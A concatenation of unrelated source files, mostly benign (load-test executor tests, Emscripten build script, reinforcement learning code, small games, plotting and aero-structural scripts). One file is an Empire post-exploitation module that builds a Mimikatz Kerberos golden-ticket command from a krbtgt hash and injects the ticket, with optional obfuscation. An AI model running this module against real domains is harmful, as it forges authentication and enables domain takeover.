filename = "BlazeDemo.java" # ensures that .java file is not copied into artifacts-dir
script_path = RESOURCES_DIR + "" + filename
self.obj.execution.merge({
"scenario": {
"script": script_path,
}
})
files = self.obj.resource_files()
self.obj_prepare_runner()
self.assertIn(script_path, files)
artifacts_script = os.path.join(self.obj.engine.artifacts_dir, filename)
self.assertFalse(os.path.exists(artifacts_script))
def test_take_script_from_artifacts(self):
"""ensures that executor looks for script in artifacts-dir (for cloud/remote cases)"""
self.obj.engine.file_search_paths = [self.obj.engine.artifacts_dir]
script_name = "BlazeDemo.java"
test_script = RESOURCES_DIR + "" + script_name
artifacts_script = os.path.join(self.obj.engine.artifacts_dir, script_name)
shutil.copy2(test_script, artifacts_script)
self.obj.execution.merge({
"scenario": {
"script": script_name,
}
})
self.obj_prepare_runner()
def test_do_not_modify_scenario_script(self):
self.obj.execution.merge({
"scenario": {
"requests": ["address"],
}
})
self.obj_prepare()
self.assertNotIn("script", self.obj.get_scenario())
def test_default_address_gen(self):
self.obj.execution.merge({
"scenario": {
"default-address": "http://blazedemo.com",
"requests": ["/", "http://absolute.address.com/somepage", "/reserve.php"],
}
})
self.obj_prepare()
with open(os.path.join(self.obj.engine.artifacts_dir, os.path.basename(self.obj.script))) as fds:
script = fds.read()
urls = re.findall(r"\.get\('(.+)'\)", script)
self.assertEqual("http://blazedemo.com/", urls[0])
self.assertEqual("http://absolute.address.com/somepage", urls[1])
self.assertEqual("http://blazedemo.com/reserve.php", urls[2])
def test_force_runner(self):
self.obj.execution.merge({
'scenario': {'script': RESOURCES_DIR + 'selenium/junit/jar/'},
'runner': 'apiritif',
})
self.obj_prepare()
self.assertIsInstance(self.obj.runner, ApiritifNoseExecutor)
def test_additional_classpath_resource_files(self):
self.obj.execution.merge({
'scenario': {
'script': RESOURCES_DIR + 'selenium/junit/jar/dummy.jar',
'runner': 'junit',
'additional-classpath': [RESOURCES_DIR + 'selenium/junit/jar/another_dummy.jar']}})
self.obj.engine.config.merge({
'modules': {
'junit': {
'additional-classpath': [RESOURCES_DIR + 'selenium/testng/jars/testng-suite.jar']}}})
own_resources = self.obj.resource_files()
all_resources = list(set(self.obj.get_resource_files()))
# scenario.script, scenario.additional-classpath, settings.additional-classpath
self.assertEqual(len(own_resources), 2)
self.assertEqual(len(all_resources), 3)
def test_add_env_path(self):
path1 = os.path.join("foo", "bar")
path2 = os.path.join("bar", "baz")
self.obj.env.add_path({"PATH": path1})
self.obj.env.add_path({"PATH": path2})
self.assertIn(path1, self.obj.env.get("PATH"))
self.assertIn(path2, self.obj.env.get("PATH"))
def test_subscribe_to_transactions(self):
dummy = DummyListener()
self.configure({
'execution': {
"iterations": 5,
'scenario': {'script': RESOURCES_DIR + 'selenium/python/test_selenium_transactions.py'},
'executor': 'selenium'
},
})
self.obj_prepare_runner()
self.obj.subscribe_to_transactions(dummy)
try:
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
fake_out = os.path.join(RESOURCES_DIR, 'apiritif/dummy-output.out')
self.obj.runner._tailer = FileReader(filename=fake_out, parent_logger=self.log)
finally:
self.obj.shutdown()
self.obj.post_process()
self.assertEqual(10, dummy.transactions['hello there'])
class TestReportReader(BZTestCase):
def test_report_reader(self):
reader = LoadSamplesReader(RESOURCES_DIR + "selenium/report.ldjson", ROOT_LOGGER)
items = list(reader._read(last_pass=True))
self.assertEqual(4, len(items))
self.assertEqual(items[0][1], 'testFailure')
self.assertEqual(items[0][6], '400')
self.assertEqual(items[1][1], 'testBroken')
self.assertEqual(items[1][6], '500')
self.assertEqual(items[2][1], 'testSuccess')
self.assertEqual(items[2][6], '200')
self.assertEqual(items[3][1], 'testUnexp')
self.assertEqual(items[3][6], 'UNKNOWN')
def test_reader_buffering(self):
first_part = b'{"a": 1, "b": 2}\n{"a": 2,'
second_part = b'"b": 3}\n{"a": 3, "b": 4}\n'
reader = LDJSONReader("yip", ROOT_LOGGER)
buffer = BytesIO(first_part)
reader.file.fds = buffer
reader.file.fds.name = "yip"
items = list(reader.read(last_pass=False))
self.assertEqual(len(items), 1)
buffer.write(second_part)
items = list(reader.read(last_pass=False))
self.assertEqual(len(items), 2)
def test_func_reader(self):
reader = FuncSamplesReader(RESOURCES_DIR + "selenium/report.ldjson", EngineEmul(), ROOT_LOGGER)
items = list(reader.read(last_pass=True))
self.assertEqual(5, len(items))
self.assertEqual(items[0].test_case, 'testFailure')
self.assertEqual(items[0].status, "FAILED")
self.assertEqual(items[1].test_case, 'testBroken')
self.assertEqual(items[1].status, "BROKEN")
self.assertEqual(items[2].test_case, 'testSuccess')
self.assertEqual(items[2].status, "PASSED")
self.assertEqual(items[4].test_case, 'SkippedTest')
self.assertEqual(items[4].status, "SKIPPED")
|
the-stack_0_1665 | #!/usr/bin/env python3
# Copyright 2016 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""Tries to evaluate global constructors, applying their effects ahead of time.
This is an LTO-like operation, and to avoid parsing the entire tree (we might
fail to parse a massive project, we operate on the text in python.
"""
import logging
import os
import subprocess
import sys
__scriptdir__ = os.path.dirname(os.path.abspath(__file__))
__rootdir__ = os.path.dirname(__scriptdir__)
sys.path.append(__rootdir__)
from tools import utils
js_file = sys.argv[1]
binary_file = sys.argv[2] # mem init for js, wasm binary for wasm
total_memory = int(sys.argv[3])
total_stack = int(sys.argv[4])
global_base = int(sys.argv[5])
binaryen_bin = sys.argv[6]
debug_info = int(sys.argv[7])
extra_args = sys.argv[8:]
wasm = bool(binaryen_bin)
assert global_base > 0
logger = logging.getLogger('ctor_evaller')
# helpers
def find_ctors(js):
ctors_start = js.find('__ATINIT__.push(')
if ctors_start < 0:
return (-1, -1)
ctors_end = js.find(');', ctors_start)
assert ctors_end > 0
ctors_end += 3
return (ctors_start, ctors_end)
def find_ctors_data(js, num):
ctors_start, ctors_end = find_ctors(js)
assert ctors_start > 0
ctors_text = js[ctors_start:ctors_end]
all_ctors = [ctor for ctor in ctors_text.split(' ') if ctor.endswith('()') and not ctor == 'function()' and '.' not in ctor]
all_ctors = [ctor.replace('()', '') for ctor in all_ctors]
assert all(ctor.startswith('_') for ctor in all_ctors)
all_ctors = [ctor[1:] for ctor in all_ctors]
assert len(all_ctors)
ctors = all_ctors[:num]
return ctors_start, ctors_end, all_ctors, ctors
def eval_ctors(js, wasm_file, num):
ctors_start, ctors_end, all_ctors, ctors = find_ctors_data(js, num)
cmd = [os.path.join(binaryen_bin, 'wasm-ctor-eval'), wasm_file, '-o', wasm_file, '--ctors=' + ','.join(ctors)]
cmd += extra_args
if debug_info:
cmd += ['-g']
logger.debug('wasm ctor cmd: ' + str(cmd))
try:
err = subprocess.run(cmd, stderr=subprocess.PIPE, timeout=10).stdout
except subprocess.TimeoutExpired:
logger.debug('ctors timed out\n')
return 0, js
num_successful = err.count('success on')
logger.debug(err)
if len(ctors) == num_successful:
new_ctors = ''
else:
elements = []
for ctor in all_ctors[num_successful:]:
elements.append('{ func: function() { %s() } }' % ctor)
new_ctors = '__ATINIT__.push(' + ', '.join(elements) + ');'
js = js[:ctors_start] + new_ctors + js[ctors_end:]
return num_successful, js
# main
def main():
js = utils.read_file(js_file)
ctors_start, ctors_end = find_ctors(js)
if ctors_start < 0:
logger.debug('ctor_evaller: no ctors')
sys.exit(0)
ctors_text = js[ctors_start:ctors_end]
if ctors_text.count('(') == 1:
logger.debug('ctor_evaller: push, but no ctors')
sys.exit(0)
num_ctors = ctors_text.count('function()')
logger.debug('ctor_evaller: %d ctors, from |%s|' % (num_ctors, ctors_text))
wasm_file = binary_file
logger.debug('ctor_evaller (wasm): trying to eval %d global constructors' % num_ctors)
num_successful, new_js = eval_ctors(js, wasm_file, num_ctors)
if num_successful == 0:
logger.debug('ctor_evaller: not successful')
sys.exit(0)
logger.debug('ctor_evaller: we managed to remove %d ctors' % num_successful)
utils.write_file(js_file, new_js)
if __name__ == '__main__':
sys.exit(main())
|
the-stack_0_1666 | import os
from ..brew_exts import (
build_env_statements,
DEFAULT_HOMEBREW_ROOT,
recipe_cellar_path,
)
from ..resolvers import Dependency, NullDependency
class UsesHomebrewMixin:
def _init_homebrew(self, **kwds):
cellar_root = kwds.get('cellar', None)
if cellar_root is None:
cellar_root = os.path.join(DEFAULT_HOMEBREW_ROOT, "Cellar")
self.cellar_root = cellar_root
def _find_dep_versioned(self, name, version):
recipe_path = recipe_cellar_path(self.cellar_root, name, version)
if not os.path.exists(recipe_path) or not os.path.isdir(recipe_path):
return NullDependency(version=version, name=name)
commands = build_env_statements(self.cellar_root, recipe_path, relaxed=True)
return HomebrewDependency(commands)
def _find_dep_default(self, name, version):
installed_versions = self._installed_versions(name)
if not installed_versions:
return NullDependency(version=version, name=name)
# Just grab newest installed version - may make sense some day to find
# the linked version instead.
default_version = sorted(installed_versions, reverse=True)[0]
return self._find_dep_versioned(name, default_version, exact=version is None)
def _installed_versions(self, recipe):
recipe_base_path = os.path.join(self.cellar_root, recipe)
if not os.path.exists(recipe_base_path):
return []
names = os.listdir(recipe_base_path)
return filter(lambda n: os.path.isdir(os.path.join(recipe_base_path, n)), names)
class UsesToolDependencyDirMixin:
def _init_base_path(self, dependency_manager, **kwds):
self.base_path = os.path.abspath( kwds.get('base_path', dependency_manager.default_base_path) )
class UsesInstalledRepositoriesMixin:
def _get_installed_dependency( self, name, type, version=None, **kwds ):
installed_tool_dependencies = kwds.get("installed_tool_dependencies", [])
for installed_tool_dependency in (installed_tool_dependencies or []):
name_and_type_equal = installed_tool_dependency.name == name and installed_tool_dependency.type == type
if version:
if name_and_type_equal and installed_tool_dependency.version == version:
return installed_tool_dependency
else:
if name_and_type_equal:
return installed_tool_dependency
return None
class HomebrewDependency(Dependency):
def __init__(self, commands, exact=True):
self.commands = commands
self._exact = exact
@property
def exact(self):
return self._exact
def shell_commands(self, requirement):
raw_commands = self.commands.replace("\n", ";")
return raw_commands
def __repr__(self):
return "PlatformBrewDependency[commands=%s]" % self.commands
|
the-stack_0_1667 | """
Unit test each component in CADRE using some saved data from John's CMF implementation.
"""
import unittest
from parameterized import parameterized
import numpy as np
from openmdao.api import Problem
from CADRE.attitude import Attitude_Angular, Attitude_AngularRates, \
Attitude_Attitude, Attitude_Roll, Attitude_RotationMtx, \
Attitude_RotationMtxRates, Attitude_Sideslip, Attitude_Torque
from CADRE.battery import BatterySOC, BatteryPower, BatteryConstraints
from CADRE.comm import Comm_DataDownloaded, Comm_AntRotation, Comm_AntRotationMtx, \
Comm_BitRate, Comm_Distance, Comm_EarthsSpin, Comm_EarthsSpinMtx, Comm_GainPattern, \
Comm_GSposEarth, Comm_GSposECI, Comm_LOS, Comm_VectorAnt, Comm_VectorBody, \
Comm_VectorECI, Comm_VectorSpherical
from CADRE.orbit import Orbit_Dynamics # , Orbit_Initial
from CADRE.parameters import BsplineParameters
from CADRE.power import Power_CellVoltage, Power_SolarPower, Power_Total
from CADRE.reactionwheel import ReactionWheel_Motor, ReactionWheel_Power, \
ReactionWheel_Torque, ReactionWheel_Dynamics
from CADRE.solar import Solar_ExposedArea
from CADRE.sun import Sun_LOS, Sun_PositionBody, Sun_PositionECI, Sun_PositionSpherical
from CADRE.thermal_temperature import ThermalTemperature
from CADRE.test.util import load_validation_data
#
# component types to test
#
component_types = [
# from CADRE.attitude
Attitude_Angular, Attitude_AngularRates,
Attitude_Attitude, Attitude_Roll, Attitude_RotationMtx,
Attitude_RotationMtxRates, Attitude_Sideslip, Attitude_Torque,
# from CADRE.battery
BatterySOC, BatteryPower, BatteryConstraints,
# from CADRE.comm
Comm_DataDownloaded, Comm_AntRotation, Comm_AntRotationMtx,
Comm_BitRate, Comm_Distance, Comm_EarthsSpin, Comm_EarthsSpinMtx, Comm_GainPattern,
Comm_GSposEarth, Comm_GSposECI, Comm_LOS, Comm_VectorAnt, Comm_VectorBody,
Comm_VectorECI, Comm_VectorSpherical,
# from CADRE.orbit
Orbit_Dynamics, # Orbit_Initial was not recorded in John's pickle.
# from CADRE.parameters
BsplineParameters,
# from CADRE.power
Power_CellVoltage, Power_SolarPower, Power_Total,
# from CADRE.reactionwheel
ReactionWheel_Motor, ReactionWheel_Power,
ReactionWheel_Torque, ReactionWheel_Dynamics,
# from CADRE.solar
Solar_ExposedArea,
# from CADRE.sun
Sun_LOS, Sun_PositionBody, Sun_PositionECI, Sun_PositionSpherical,
# from CADRE.thermal_temperature
ThermalTemperature
]
#
# load saved data from John's CMF implementation.
#
n, m, h, setd = load_validation_data(idx='5')
class TestCADRE(unittest.TestCase):
@parameterized.expand([(_class.__name__, _class) for _class in component_types],
testcase_func_name=lambda f, n, p: 'test_' + p.args[0])
def test_component(self, name, comp_class):
try:
comp = comp_class(n)
except TypeError:
try:
comp = comp_class()
except TypeError:
comp = comp_class(n, 300)
self.assertTrue(isinstance(comp, comp_class),
'Could not create instance of %s' % comp_class.__name__)
prob = Problem(comp)
prob.setup()
prob.final_setup()
inputs = comp.list_inputs(out_stream=None)
outputs = comp.list_outputs(out_stream=None)
for var, meta in inputs:
if var in setd:
prob[var] = setd[var]
comp.h = h # some components need this
prob.run_model()
for var, meta in outputs:
if var in setd:
tval = setd[var]
assert(np.linalg.norm(tval - prob[var]) / np.linalg.norm(tval) < 1e-3), \
'%s: Expected\n%s\nbut got\n%s' % (var, str(tval), str(prob[var]))
if __name__ == "__main__":
unittest.main()
|
the-stack_0_1674 | from random import choice, sample
cartas = {
chr(0x1f0a1): 11,
chr(0x1f0a2): 2,
chr(0x1f0a3): 3,
chr(0x1f0a4): 4,
chr(0x1f0a5): 5,
chr(0x1f0a6): 6,
chr(0x1f0a7): 7,
chr(0x1f0a8): 8,
chr(0x1f0a9): 9,
chr(0x1f0aa): 10,
chr(0x1f0ab): 10,
chr(0x1f0ad): 10,
chr(0x1f0ae): 10,
}
for carta, valor in cartas.items():
print("la carta {} vale {}".format(carta, valor))
print("Empieza el Black Jack")
lista_cartas = list(cartas)
main_jugador = sample(lista_cartas, 2)
score_jugador = sum(cartas[carta] for carta in main_jugador)
print("Te han tocado las cartas: {} {} , y su puntuación es {}.".format(main_jugador[0],
main_jugador[1],
score_jugador))
main_banca = sample(lista_cartas, 2)
score_banca = sum(cartas[carta] for carta in main_banca)
print("La banca tiene las cartas: {} {} , y su puntuación es {}.".format(main_banca[0],
main_banca[1],
score_banca)) |
the-stack_0_1675 | import csv
import os
#import pandas as pd
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
#import scipy.stats as stats
def main():
test_dir = "length_500"
data = get_data(test_dir)
plot_aggregate_over_time(data, "schaffer", test_dir)
plot_stddev_over_time(data, "schaffer", test_dir)
plot_average_final_fitness(data, "schaffer", test_dir)
#plot_single_run_over_time(data[data.keys()[0]]["1"]["average_experienced"], test_dir)
#print data.keys()[0]
def get_data(common_dir):
data = {}
for d in os.listdir(common_dir):
if not os.path.isdir(common_dir + "/" + d):
continue
dir_name_list = d.split("/")[-1].split("_")
idnum = dir_name_list[-1]
config = "_".join(dir_name_list[:-1])
if config in data:
data[config][idnum] = {}
else:
data[config] = {}
data[config][idnum] = {}
with open(common_dir+"/"+d+"/correlation.dat") as infile:
data[config][idnum]["correlation"] = float(infile.readline())
data[config][idnum]["average_experienced"] = import_csv(common_dir+"/"+d+"/experienced_fitnesses.csv")
data[config][idnum]["average_reference"] = import_csv(common_dir+"/"+d+"/reference_fitnesses.csv")
#data[config][idnum]["best_experienced"] = import_csv(common_dir+"/"+d+"/experienced_best_fitnesses.csv")
#data[config][idnum]["best_reference"] = import_csv(common_dir+"/"+d+"/reference_best_fitnesses.csv")
return data
def import_csv(file_name):
with open(file_name, "rb") as csvfile:
csv_reader = csv.reader(csvfile)
data = []
data.append(csv_reader.next())
#print(data)
for row in csv_reader:
#print(row)
data.append([float(i) for i in row])
return data
def plot_single_run_over_time(single_run_data, directory):
plt.clear()
plt.plot(single_run_data["Generation"], np.log(single_run_data["Average_Fitness"]))
plt.savefig(directory+"/single_run_over_time.png")
def plot_aggregate_over_time(data, key=None, directory="."):
plt.clf()
lines = {}
for config in data:
if (key != None and key not in config):
continue
series = []
for run in data[config]:
series.append([])
for i in range(1, len(data[config][run]["average_reference"])):
series[-1].append(data[config][run]["average_reference"][i][1])
averages = []
#stdevs = []
for i in range(len(series[0])):
add_factor = 0
if "rana" in config:
add_factor = 20000
logs = [np.log(s[i]+add_factor) for s in series]
averages.append(sum(logs)/float(len(logs)))
lines[config] = Line2D(data[config][data[config].keys()[0]]["average_reference"][0], averages)
x = []
for i in range(1,len(data[config][data[config].keys()[0]]["average_reference"])):
x.append(data[config][data[config].keys()[0]]["average_reference"][i][0])
plt.plot(x, averages, hold=True, label=config)
plt.legend(loc="upper right")
plt.xlabel("Generation")
plt.ylabel("Average Fitness")
#plt.figlegend([lines[l] for l in lines], [l for l in lines])
plt.savefig(directory+"/runs_over_time_"+key+"_2500gen.png")
def plot_stddev_over_time(data, key=None, directory="."):
plt.clf()
lines = {}
for config in data:
if (key != None and key not in config):
continue
series = []
for run in data[config]:
series.append([])
for i in range(1, len(data[config][run]["average_reference"])):
series[-1].append(data[config][run]["average_reference"][i][2])
averages = []
#stdevs = []
for i in range(len(series[0])):
add_factor = 0
if "rana" in config:
add_factor = 20000
devs = [s[i] for s in series]
averages.append(sum(devs)/float(len(devs)))
lines[config] = Line2D(data[config][data[config].keys()[0]]["average_reference"][0], averages)
x = []
for i in range(1,len(data[config][data[config].keys()[0]]["average_reference"])):
x.append(data[config][data[config].keys()[0]]["average_reference"][i][0])
plt.plot(x, averages, hold=True, label=config)
plt.legend(loc="upper right")
plt.xlabel("Generation")
plt.ylabel("Average Fitness")
#plt.figlegend([lines[l] for l in lines], [l for l in lines])
plt.savefig(directory+"/diversity_over_time_"+key+"_2500gen.png")
def plot_average_final_fitness(data, key=None, directory="."):
plt.clf()
corrs = []
finals = []
for config in data:
if key == None or key in config:
for run in data[config]:
corrs.append(data[config][run]["correlation"])
add_factor=0
if "rana" in config:
add_factor = 20000
finals.append(add_factor+float(data[config][run]["average_reference"][-1][1]))
#finals.append(float(data[config][run]["best_reference"]["Best_fitness"][-1:]))
plt.plot(corrs, np.log(finals), ".")
plt.xlabel("Correlation")
plt.ylabel("Average Fitness")
plt.savefig(directory+"/correlation_vs_final_fitness_scatter_"+key+".png")
if __name__ == "__main__":
main()
|
the-stack_0_1677 | # Copyright 2015 Jason Meridth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pyhole Allergies Plugin"""
import datetime
from pyhole.core import plugin
from pyhole.core import utils
class Allergies(plugin.Plugin):
"""Provide access to current allergy data."""
@plugin.hook_add_command("allergies")
@utils.spawn
def allergies(self, message, params=None, **kwargs):
"""Display current allergies in San Antonio, TX (ex: .allergies)."""
d = datetime.datetime.now()
weekend = d.isoweekday() in (6, 7)
if weekend:
message.dispatch("Unable to fetch allergy data on weekends.")
return
today = d.strftime("%Y-%m-%d")
url = "http://saallergy.info/day/%s" % today
headers = {"accept": "application/json"}
response = utils.fetch_url(url, headers=headers)
if response.status_code != 200:
return
data = response.json()
text = "Allergies for %s: " % today
for a in data["results"]:
text = text + "%s - %s (%s) | " % (a["allergen"], a["level"],
a["count"])
text = text.rstrip(" ")
text = text.rstrip("|")
message.dispatch(text)
@plugin.hook_add_command("pollen")
def alias_pollen(self, message, params=None, **kwargs):
"""Alias of allergies."""
self.allergies(message, params, **kwargs)
|
the-stack_0_1679 | """
To run the code for each problem, simply run the 'runP#.py' file.
So for this problem, run runP3.py
The P#classes.py files are very similar across problems,
but each includes a scaling which is (roughly) optimized for that specific problem.
The runP#.py file will automatically import the necessary classes from the appropriate location.
"""
import torch
import torch.nn as nn
from torch.distributions import Normal
import cv2
import numpy as np
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Memory:
def __init__(self):
self.actions = []
self.states = []
self.logprobs = []
self.rewards = []
self.is_terminals = []
def clear_memory(self):
del self.actions[:]
del self.states[:]
del self.logprobs[:]
del self.rewards[:]
del self.is_terminals[:]
class ActorCritic(nn.Module):
def __init__(self, state_dim, action_dim, n_latent_var_a1, n_latent_var_a2, n_latent_var_c1, n_latent_var_c2):
super(ActorCritic, self).__init__()
# actor
self.action_layer = nn.Sequential(
nn.Linear(state_dim, n_latent_var_a1),
nn.ReLU(),
nn.Linear(n_latent_var_a1, n_latent_var_a2),
nn.ReLU(),
nn.Linear(n_latent_var_a2, action_dim)
)
# critic
self.value_layer = nn.Sequential(
nn.Linear(state_dim, n_latent_var_c1),
nn.ReLU(),
nn.Linear(n_latent_var_c1, n_latent_var_c2),
nn.ReLU(),
nn.Linear(n_latent_var_c2, 1)
)
def forward(self):
raise NotImplementedError
def act(self, state, std_scale, memory):
state = torch.from_numpy(state).float().to(device)
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action = dist.sample()
action = 1 * action
memory.states.append(state)
memory.actions.append(action)
memory.logprobs.append(dist.log_prob(action))
return action.detach().numpy()
def act_deterministic(self, state, std_scale, memory):
state = torch.from_numpy(state).float().to(device)
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action = action_probs
action = 1 * action
memory.states.append(state)
memory.actions.append(action)
memory.logprobs.append(dist.log_prob(action))
return action.detach().numpy()
def evaluate(self, state, action, std_scale):
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action_logprobs = dist.log_prob(action)
dist_entropy = dist.entropy()
state_value = self.value_layer(state)
return action_logprobs, torch.squeeze(state_value), dist_entropy
def film_stochastic_vid(self, filepath, trial_num, random_seed, environment, max_timesteps, ppo, memory,
std_scale):
out = cv2.VideoWriter(filepath.format(trial_num, random_seed),
cv2.VideoWriter_fourcc(*'mp4v'), 30,
(640, 480))
img = environment.render()
out.write(np.array(img))
state = environment.reset()
for scene in range(max_timesteps):
action = ppo.policy_old.act(state, std_scale, memory)
next_state, reward, done, _ = environment.step(action)
img = environment.render()
out.write(np.array(img))
state = next_state
out.release()
memory.clear_memory()
def film_deterministic_vid(self, filepath, trial_num, random_seed, environment, max_timesteps, ppo, memory,
std_scale):
out = cv2.VideoWriter(filepath.format(trial_num, random_seed),
cv2.VideoWriter_fourcc(*'mp4v'), 30,
(640, 480))
img = environment.render()
out.write(np.array(img))
state = environment.reset()
for scene in range(max_timesteps):
action = ppo.policy_old.act_deterministic(state, std_scale, memory)
next_state, reward, done, _ = environment.step(action)
img = environment.render()
out.write(np.array(img))
state = next_state
out.release()
memory.clear_memory()
class PPO:
def __init__(self, environment, state_dim, action_dim, n_latent_var_a1, n_latent_var_a2, n_latent_var_c1,
n_latent_var_c2, lr, gamma, K_epochs, eps_clip, entropy_beta, critic_coef):
self.environment = environment
self.lr = lr
self.gamma = gamma
self.eps_clip = eps_clip
self.K_epochs = K_epochs
self.entropy_beta = entropy_beta
self.critic_coef = critic_coef
self.policy = ActorCritic(state_dim, action_dim,
n_latent_var_a1, n_latent_var_a2,
n_latent_var_c1, n_latent_var_c2).to(device)
self.optimizer = torch.optim.Adam(self.policy.parameters(), lr=lr)
self.policy_old = ActorCritic(state_dim, action_dim,
n_latent_var_a1, n_latent_var_a2,
n_latent_var_c1, n_latent_var_c2).to(device)
self.policy_old.load_state_dict(self.policy.state_dict())
self.MseLoss = nn.MSELoss()
def update(self, memory, std_scale):
# I found that for my implementation, using this form of the rollouts worked best
disc_reward = 0
rewards_bin = []
# We begin with the latest rewards, and work backwards
for reward, is_terminal in zip(reversed(memory.rewards), reversed(memory.is_terminals)):
if is_terminal:
disc_reward = 0
disc_reward = (disc_reward * self.gamma) + reward
# Insert backwards, since we 'reversed' above.
rewards_bin.insert(0, disc_reward)
rewards = torch.tensor(rewards_bin).to(device)
rewards = (rewards - rewards.mean()) / (rewards.std() + 1e-5)
# Must convert lists to tensors
old_logprobs = torch.stack(memory.logprobs).to(device).detach()
old_actions = torch.stack(memory.actions).to(device).detach()
old_states = torch.stack(memory.states).to(device).detach()
# Now we optimize the policy
for _ in range(self.K_epochs):
logprobs, state_values, dist_entropy = self.policy.evaluate(old_states, old_actions, std_scale=std_scale)
# First we find the ratio of the probabilities of selecting action a_t, given state s_t, under
# the new and old policies, respectively.
# We can use the log to make this more computationally efficient.
newold_ratio = torch.exp(logprobs - old_logprobs.detach())
# subtract of the state-values from the rewards to get the advantages
advantages = rewards - state_values.detach()
# Reshape this
newold_ratio = newold_ratio.view(2, -1)
target1 = newold_ratio * advantages
# In pytorch, 'clamp' is how we clip.
target2 = torch.clamp(newold_ratio, 1 - self.eps_clip, 1 + self.eps_clip)
target3 = target2 * advantages
# We need to isolate out the third term to reshape it appropriately
entropy = self.entropy_beta * dist_entropy
entropy = entropy.view(2, -1)
actor_loss = -torch.min(target1, target3)
critic_loss = self.critic_coef * self.MseLoss(state_values, rewards)
# Now we have our total loss
loss = actor_loss + critic_loss - entropy
# now perform update via gradient step
self.optimizer.zero_grad()
loss.mean().backward()
self.optimizer.step()
self.policy_old.load_state_dict(self.policy.state_dict()) |
the-stack_0_1680 | from turtle import Turtle, Screen
import time
screen = Screen()
screen.bgcolor('black')
screen.title('My Snake Game')
screen.tracer(0)
starting_positions = [(0, 0), (-20, 0), (-48, 0)]
pace = 20
segments = []
for position in starting_positions:
new_segment = Turtle("square")
new_segment.color("white")
new_segment.penup()
new_segment.goto(position)
segments.append(new_segment)
game_is_on = True
while game_is_on:
screen.update()
time.sleep(0.1)
for seg_num in range(len(segments) - 1, 0, -1):
new_x = segments[seg_num - 1].xcor()
new_y = segments[seg_num - 1].ycor()
segments[seg_num].goto(new_x, new_y)
segments[0].forward(pace)
screen.exitonclick() |
the-stack_0_1681 | from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.database.models import Credential
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# if a credential ID is specified, try to parse
cred_id = params["CredID"]
if cred_id != "":
if not main_menu.credentials.is_credential_valid(cred_id):
return handle_error_message("[!] CredID is invalid!")
cred: Credential = main_menu.credentials.get_credentials(cred_id)
if cred.username != "krbtgt":
return handle_error_message("[!] A krbtgt account must be used")
if cred.domain != "":
params["domain"] = cred.domain
if cred.sid != "":
params["sid"] = cred.sid
if cred.password != "":
params["krbtgt"] = cred.password
if params["krbtgt"] == "":
print(helpers.color("[!] krbtgt hash not specified"))
# build the golden ticket command
script_end = "Invoke-Mimikatz -Command '\"kerberos::golden"
for option,values in params.items():
if option.lower() != "agent" and option.lower() != "credid":
if values and values != '':
script_end += " /" + str(option) + ":" + str(values)
script_end += " /ptt\"'"
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
|
the-stack_0_1682 | import numpy as np
import openmdao.api as om
from mphys.multipoint import Multipoint
from mphys.scenario_aerostructural import ScenarioAeroStructural
from vlm_solver.mphys_vlm import VlmBuilder
from tacs.mphys import TacsBuilder
from mphys.solver_builders.mphys_meld import MeldBuilder
from struct_dv_components import StructDvMapper, SmoothnessEvaluatorGrid, struct_comps
import tacs_setup
check_derivs = False
class Top(Multipoint):
def setup(self):
# VLM
mesh_file = 'wing_VLM.dat'
mach = 0.85
aoa0 = 2.0
aoa1 = 5.0
q_inf = 12000.
vel = 178.
nu = 3.5E-5
aero_builder = VlmBuilder(mesh_file)
aero_builder.initialize(self.comm)
dvs = self.add_subsystem('dvs', om.IndepVarComp(), promotes=['*'])
dvs.add_output('aoa', val=[aoa0,aoa1], units='deg')
dvs.add_output('mach', mach)
dvs.add_output('q_inf', q_inf)
dvs.add_output('vel', vel)
dvs.add_output('nu', nu)
self.add_subsystem('mesh_aero',aero_builder.get_mesh_coordinate_subsystem())
# TACS
tacs_options = {'element_callback': tacs_setup.element_callback,
'problem_setup': tacs_setup.problem_setup,
'mesh_file': 'wingbox_Y_Z_flip.bdf'}
struct_builder = TacsBuilder(tacs_options)
struct_builder.initialize(self.comm)
self.add_subsystem('mesh_struct',struct_builder.get_mesh_coordinate_subsystem())
initial_thickness = 0.003
dvs.add_output('ribs', val=initial_thickness, shape = struct_comps['ribs'])
dvs.add_output('le_spar', val=initial_thickness, shape = struct_comps['le_spar'])
dvs.add_output('te_spar', val=initial_thickness, shape = struct_comps['te_spar'])
dvs.add_output('up_skin', val=initial_thickness, shape = struct_comps['up_skin'])
dvs.add_output('lo_skin', val=initial_thickness, shape = struct_comps['lo_skin'])
dvs.add_output('up_stringer', val=initial_thickness, shape = struct_comps['up_stringer'])
